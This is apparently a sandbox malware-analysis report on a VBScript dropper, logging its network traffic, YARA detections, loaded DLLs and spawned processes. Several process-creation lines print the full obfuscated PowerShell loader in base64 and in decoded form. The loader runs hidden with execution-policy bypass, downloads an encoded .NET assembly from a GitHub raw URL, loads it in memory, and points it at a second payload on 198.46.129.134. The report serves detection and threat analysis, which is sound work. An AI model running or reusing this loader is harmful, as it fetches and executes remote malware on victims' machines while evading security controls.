Source: unknownTCP traffic detected without corresponding DNS query: 198.46.129.134
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.129.134
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.129.134
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.129.134
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /450/LDBRR.txt HTTP/1.1Host: 198.46.129.134Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 03:28:25 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Content-Length: 300Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 34 36 2e 31 32 39 2e 31 33 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 198.46.129.134 Port 80</address></body></html>
Source: powershell.exe, 00000006.00000002.1348872454.00000177575DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.129.134
Source: powershell.exe, 00000006.00000002.1348872454.00000177575DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.129.134/450/LDBRR.txt
Source: powershell.exe, 00000006.00000002.1364577618.0000017767224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1348872454.0000017758B54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1348872454.0000017758ACE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.1348872454.0000017758890000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000004.00000002.1396024247.000001C822940000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1348872454.00000177571B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.1348872454.00000177588D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000006.00000002.1348872454.0000017758ACE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.1396024247.000001C822913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1396024247.000001C8228EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1348872454.00000177571B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.1348872454.0000017758B54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1348872454.0000017758B54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1348872454.0000017758B54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.1348872454.0000017758ACE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.1348872454.00000177582C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000006.00000002.1364577618.0000017767224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1348872454.0000017758B54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000006.00000002.1348872454.00000177588D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000006.00000002.1348872454.00000177588D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000006.00000002.1348872454.000001775888B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000006.00000002.1348872454.00000177573D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1348872454.00000177582C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000006.00000002.1348872454.00000177573D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1348872454.00000177582C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Source: powershell.exe, 00000006.00000002.1348872454.00000177573D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtUNI;
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49704 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 2980, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7304, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAC540FFA4_2_00007FFAAC540FFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFAAC6331D26_2_00007FFAAC6331D2
Source: uLfuBVyZFV.vbsInitial sample: Strings found which are bigger than 50
Source: Process Memory Space: powershell.exe PID: 2980, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7304, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.expl.evad.winVBS@6/5@1/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7180:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_thwqgli0.33f.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs"
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))"Jump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
